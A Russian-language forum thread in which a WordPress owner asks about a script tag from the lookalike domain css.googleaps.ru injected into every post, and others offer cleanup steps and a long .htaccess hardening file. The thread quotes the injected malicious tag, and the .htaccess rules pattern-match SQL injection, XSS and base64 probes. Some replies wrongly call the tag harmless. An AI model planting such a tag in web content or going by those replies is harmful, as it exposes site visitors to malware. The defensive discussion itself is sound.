Нужна помощь в решении проблемы

bozon · November 23, 2016

Подскажите что это за фигня такая, сегодня при редактировании текстов обнаружил что в КАЖДОЙ записи присутствует такой код <script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script> проверка на вирусы ничего не дала, погуглил этот скрипт, вижу у многих такая проблема возникала, но толком никто не сказал что это за скрипт и как от него избавиться. Может кто-то из форумчан знает?

Сегодня неожиданно обнаружил, что часть записей пропала с сайта, сделал бекап, записи восстановил и вновь почистил БД от этого скрипта, и сного записи пропали, тут явная связь, может не стоит удалять этот скрипт, хотя везде говорят что этот скрипт вредоносный, хоть и не говорят какой именно веред он несет. Может кто сталкивался с этим, как решить этоту проблему. Сайт на WP.

Если тема создана в неподходящем разделе, прошу модераторов перенести в нужный раздел(не нашел на форуме раздела об уязвимостях)

Заранее спасибо.

vituson · November 23, 2016

jms.in.ua/blog/52-udalyaem-vredonosnyj-kod-iz-wordpress

kuzovbmw · November 23, 2016

ну вообще код похож на вызов шрифтов гугла, только как то прописан странно, не, это не вирус

bozon · November 23, 2016

jms.in.ua/blog/52-udalyaem-vredonosnyj-kod-iz-wordpress

Использовал рекомендации с этого сайта еще вчера, а сегодня пропала часть статей с сайта)))

vituson · November 23, 2016

Использовал рекомендации с этого сайта еще вчера, а сегодня пропала часть статей с сайта)))

План действий:

1. Поменять пароли на хостинг, на FTP.

2. Восстановить бекап, поменять пароль на админку.

3. Поставить плагины защиты:

vituson.ru/pochemu-vozrosla-nagruzka-na-server

vituson.ru/nabor-plaginov-wordpress-dlya-zashhity-ot-xakerov

4. Удалить из записей бяку.

vituson · November 23, 2016

Плагины для защиты WP, которые ставлю на все свои сайты:

Acunetix WP Security

Anti-XSS attack

belavir (php MD5)

Disable XML-RPC Pingback

Wordpress Firewall 2

"Плюс" закрываю админку по IP и редактирую файл htaccess:

Содержание для файла .htaccess с блокировкой всякой дряни:

Options +FollowSymLinks -Indexes

<IfModule mod_headers.c>
Header always append X-Frame-Options SAMEORIGIN
</IfModule>

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode[^(]*$[^)]*$ [OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{query_string} concat.*\( [NC,OR]
RewriteCond %{query_string} union.*select.*\( [NC,OR]
RewriteCond %{query_string} union.*all.*select [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteCond %{REQUEST_URI} !^/index\.php
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule .* index.php [L]

<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascript
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4.0[678] no-gzip
BrowserMatch bMSIE !no-gzip !gzip-only-text/html
<ifmodule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_item_include file \.js$
mod_gzip_item_include file \.css$ </ifmodule>
</IfModule>

RewriteEngine on
RewriteCond %{HTTP_REFERER} semalt\.com [NC,OR]
RewriteCond %{HTTP_REFERER} success-seo\.com [NC,OR]
RewriteCond %{HTTP_REFERER} best-seo-solution\.com [NC,OR]
RewriteCond %{HTTP_REFERER} buttons-for-website\.com [NC,OR]
RewriteCond %{HTTP_REFERER} buttons-for-your-website\.com [NC,OR]
RewriteCond %{HTTP_REFERER} best-seo-offer\.com [NC,OR]
RewriteCond %{HTTP_REFERER} rankings-analytics\.com [NC,OR]
RewriteCond %{HTTP_USER_AGENT} .*MJ12bot.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Java [OR]
RewriteCond %{HTTP_USER_AGENT} NjuiceBot [OR]
RewriteCond %{HTTP_USER_AGENT} Gigabot [OR]
RewriteCond %{HTTP_USER_AGENT} Baiduspider [OR]
RewriteCond %{HTTP_USER_AGENT} JS-Kit [OR]
RewriteCond %{HTTP_USER_AGENT} Voyager [OR]
RewriteCond %{HTTP_USER_AGENT} PostRank [OR]
RewriteCond %{HTTP_USER_AGENT} PycURL [OR]
RewriteCond %{HTTP_USER_AGENT} Aport [OR]
RewriteCond %{HTTP_USER_AGENT} DotBot [OR]
RewriteCond %{HTTP_USER_AGENT} SurveyBot [OR]
RewriteCond %{HTTP_USER_AGENT} larbin [OR]
RewriteCond %{HTTP_USER_AGENT} Butterfly [OR]
RewriteCond %{HTTP_USER_AGENT} libwww [OR]
RewriteCond %{HTTP_USER_AGENT} Wget [OR]
RewriteCond %{HTTP_USER_AGENT} SWeb [OR]
RewriteCond %{HTTP_USER_AGENT} LinkExchanger [OR]
RewriteCond %{HTTP_USER_AGENT} Soup [OR]
RewriteCond %{HTTP_USER_AGENT} WordPress [OR]
RewriteCond %{HTTP_USER_AGENT} spbot [OR]
RewriteCond %{HTTP_USER_AGENT} MLBot [OR]
RewriteCond %{HTTP_USER_AGENT} InternetSeer [OR]
RewriteCond %{HTTP_USER_AGENT} FairShare [OR]
RewriteCond %{HTTP_USER_AGENT} Yeti [OR]
RewriteCond %{HTTP_USER_AGENT} Birubot [OR]
RewriteCond %{HTTP_USER_AGENT} YottosBot [OR]
RewriteCond %{HTTP_USER_AGENT} gold\ crawler [OR]
RewriteCond %{HTTP_USER_AGENT} Linguee [OR]
RewriteCond %{HTTP_USER_AGENT} Ezooms [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} Purebot [OR]
RewriteCond %{HTTP_USER_AGENT} User-Agent [OR]
RewriteCond %{HTTP_USER_AGENT} kmSearchBot [OR]
RewriteCond %{HTTP_USER_AGENT} SiteBot [OR]
RewriteCond %{HTTP_USER_AGENT} CamontSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ptd-crawler [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [OR]
RewriteCond %{HTTP_USER_AGENT} suggybot [OR]
RewriteCond %{HTTP_USER_AGENT} ttCrawler [OR]
RewriteCond %{HTTP_USER_AGENT} Nutch [OR]
RewriteCond %{HTTP_USER_AGENT} msnbot [OR]
RewriteCond %{HTTP_USER_AGENT} msnbot-media [OR]
RewriteCond %{HTTP_USER_AGENT} Slurp [OR]
RewriteCond %{HTTP_USER_AGENT} Zeus
RewriteRule ^(.*)$ – [F,L]

<Files xmlrpc.php>
Order Deny,Allow
Deny from all
</Files>

<files .htaccess>
order allow,deny
deny from all
</files>

<files wp-config.php>
order allow,deny
deny from all
</files>

SetEnvIf user-agent "Indy Library" stayout=1
SetEnvIf user-agent "libwww-perl" stayout=1
SetEnvIf user-agent "Wget" stayout=1
deny from env=stayout

<IfModule mod_headers.c>
<FilesMatch "\.(js|css|xml|gz)$">
Header append Vary: Accept-Encoding
</FilesMatch>
</IfModule>

<IfModule mod_security.c>
<Files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>
<IfModule mod_security.c>
<Files upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

bozon · November 23, 2016

План действий:

1. Поменять пароли на хостинг, на FTP.

2. Восстановить бекап, поменять пароль на админку.

3. Поставить плагины защиты:

vituson.ru/pochemu-vozrosla-nagruzka-na-server

vituson.ru/nabor-plaginov-wordpress-dlya-zashhity-ot-xakerov

4. Удалить из записей бяку.

Пароли менял и на админ панель сайта, на админку хостинга, и на фтп, и бекап делал, и бяку чистил сначало вручную, потом надоело, вычистил из БД, а сегодня обнаружил что части статей на сайте нет( даже само количество статей, в "опубликованных" меньше, сделал бекап, статьи вернулись, вычистил бяку еще раз, статьи пропали. Вот сейчас думаю что делать дальше, по-любому бекап, но сначало нужно решить вопрос со скриптом, что это за байда такая? если действительно безобидная вещь, вроде вывода шрифтов гугла, как считают некоторые, то и хрен с ней, а если что-то серьезное, надо сначало с этим разобраться. Писал хостеру, он пишет что сам не в курсе и всю инфу по этому скрипту сам искал в инете.(реальный ответ хостера. SPRINTHOSTкстати)

vebster777 · November 23, 2016

ну вообще код похож на вызов шрифтов гугла, только как то прописан странно, не, это не вирус

в том то и дело, что похож, это как раз таки очень похоже на вирус, смотрим домен css.googleaps.ru , хоть раз такой видели у гугла ?

seo-net · November 23, 2016

хотел попробовать открыть этот подозрительный сайт, отдает ошибку 403

vebster777 · November 23, 2016

Пароли менял и на админ панель сайта, на админку хостинга, и на фтп, и бекап делал, и бяку чистил сначало вручную, потом надоело, вычистил из БД, а сегодня обнаружил что части статей на сайте нет( даже само количество статей, в "опубликованных" меньше, сделал бекап, статьи вернулись, вычистил бяку еще раз, статьи пропали. Вот сейчас думаю что делать дальше, по-любому бекап, но сначало нужно решить вопрос со скриптом, что это за байда такая? если действительно безобидная вещь, вроде вывода шрифтов гугла, как считают некоторые, то и хрен с ней, а если что-то серьезное, надо сначало с этим разобраться. Писал хостеру, он пишет что сам не в курсе и всю инфу по этому скрипту сам искал в инете.(реальный ответ хостера. SPRINTHOSTкстати)

анализируйте access и error логи по вашему сайту, смотрите через какие файлы получили доступ, возможно где-то не правильно выставлены права

bozon · November 23, 2016

анализируйте access и error логи по вашему сайту, смотрите через какие файлы получили доступ, возможно где-то не правильно выставлены права

По этому поводу хостер говорит что этот скрипт проник через уязвимость в WP версии ранее 4.2.1(в 4.2.1. дыру закрыли, у меня стоит версия 4.6.1)

bozon · November 23, 2016

Погуглил еще немного и нашел вот что levelit(.точка.)ru/zapis-razgovora-asterisk/ понятия не имею как это могло попасть на сайт.

Tobol · November 24, 2016

Как по мне, так это похоже на ссылку на загрузку внешнего шрифта.

А вирусы скорее всего появляются от использования варезных шаблонов и компонентов (хотя может в вашем случае это не так)

bozon · November 24, 2016

Как по мне, так это похоже на ссылку на загрузку внешнего шрифта.

А вирусы скорее всего появляются от использования варезных шаблонов и компонентов (хотя может в вашем случае это не так)

Фиг его знает что это такое, особых проблем он не доставлял, с помощью хостера удалил эту фигню из БД, подожду недельку посмотрим что получиться, пока что единственным положительным эффектом стало небольшое увеличение скорости загрузки страниц.

siteup · November 24, 2016

В случае заражения WP мы делаем так:

1. Меняем все пароли (панель хостинга, FTP, БД, админка) на сложные

2. Сносим весь WP за исключением папки wp-content и файла wp-config

3. Распаковываем скачанную с оф. сайта последнюю версию WP, предварительно удалив из дистрибутива папку wp-content

4. Меняем путь к админке (можно нагуглить, как)

5. Прогоняем проверку с помощью скрипта ai-bolit в режиме "параноидальный"

Так же добавлю, что уязвимости в ВП в основном своем со стороны плагинов. Практически всегда это плагин от каких-то непонятных деятелей.

Нужна помощь в решении проблемы

Recommended Posts

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Link to post

Share on other sites

Please sign in to comment

Recently Browsing 0 members